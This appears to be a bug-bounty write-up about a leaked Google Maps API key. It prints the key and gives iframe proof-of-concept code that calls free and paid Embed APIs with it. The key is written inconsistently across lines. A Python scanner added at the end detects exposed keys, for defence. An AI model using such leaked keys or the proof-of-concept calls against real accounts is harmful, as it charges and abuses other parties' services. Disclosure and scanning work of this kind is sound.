Google API Key Exploit
https://hackerone.com/reports/1066410
https://hackerone.com/reports/1065041
Exploit POC
https://www.youtube.com/watch?v=IEnYOsefbks
Tools to make Exploit POC
https://github.com/ozguralp/gmapsapiscanner
Hi team, I have found your Google Maps API key leaking in the source code of one of your subdomains.
Let's see how to find and use it.
Vulnerable URL: https://example.com/virtual
api key: AIzaSyBiyf0K2SL3k9iXh7cKB4mB7e03g4jd39k
Check whether the API key is working or not:
https://www.google.com/maps/embed/v1/place?key=AIzaSyBiyf0K2SL3k9iXh7cKB4mB7eo3g4jd39k&q=Seattle&language=en
It is working
Let's try to use in i
API key is vulnerable for Embed (Basic-Free) API. Here is the POC HTML code:
<iframe width="600" height="450" frameborder="0" style="border:0" src="https://www.google.com/maps/embed/v1/place?q=Seattle&key=AIzaSyBiyf0K2SL3k9iXh7cKB4mB7e03g4jd39k" allowfullscreen></iframe>
API key is vulnerable for Embed (Advanced-Paid) API. Here is the POC HTML code:
<iframe width="600" height="450" frameborder="0" style="border:0" src="https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key=AIzaSyBiyf0K2SL3k9iXh7cKB4mB7eo3g4jd39k" allowfullscreen></iframe>
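
For the defending side of this finding, the following is an added example (not part of the original report or of the linked scanner) that checks your own rendered HTML or JavaScript for Google API keys and records which Embed API tier each key is used with, using the tier labels from the report above. The function name, the sample markup and both keys are constructed for illustration.

```python
import re
from html import unescape
from urllib.parse import parse_qs, urlsplit

# Google API keys are "AIza" plus 35 URL-safe characters (39 in total).
_C = r"[0-9A-Za-z_-]"
KEY_RE = re.compile(r"(?<!%s)AIza%s{35}(?!%s)" % (_C, _C, _C))
EMBED_URL_RE = re.compile(r"https://www\.google\.com/maps/embed/v1/[^\s\"'<>]+")

# Tier labels as they appear in the report above.
EMBED_TIER = {"place": "Embed (Basic-Free)", "search": "Embed (Advanced-Paid)"}


def find_exposed_keys(text):
    """Map each key found in `text` to the Embed API tiers it is used with."""
    findings = {key: set() for key in KEY_RE.findall(text)}
    # unescape() turns "&amp;" inside HTML attributes back into "&".
    for url in EMBED_URL_RE.findall(unescape(text)):
        parts = urlsplit(url)
        mode = parts.path.rsplit("/", 1)[-1]
        tier = EMBED_TIER.get(mode, "Embed (unclassified: %s)" % mode)
        for key in parse_qs(parts.query).get("key", []):
            if key in findings:
                findings[key].add(tier)
    return {key: sorted(tiers) for key, tiers in findings.items()}


# Constructed sample input: both keys below are made up for this example.
KEY_A = "AIzaSy" + "x" * 33
KEY_B = "AIzaSy" + "y" * 33
SAMPLE_HTML = "\n".join([
    '<iframe src="https://www.google.com/maps/embed/v1/place'
    '?q=Seattle&amp;key=' + KEY_A + '"></iframe>',
    '<iframe src="https://www.google.com/maps/embed/v1/search'
    '?q=record+stores+in+Seattle&key=' + KEY_A + '"></iframe>',
    '<script>var cfg = {mapsKey: "' + KEY_B + '"};</script>',
])

if __name__ == "__main__":
    for key, tiers in find_exposed_keys(SAMPLE_HTML).items():
        # Print only a prefix so the scan output does not re-leak the key.
        print(key[:8] + "...", tiers or ["no Embed URL in this input"])
```

A Maps key embedded in a page is visible to every visitor, so a hit from this check is a prompt to confirm that the key carries HTTP-referrer and API restrictions, not proof of misuse.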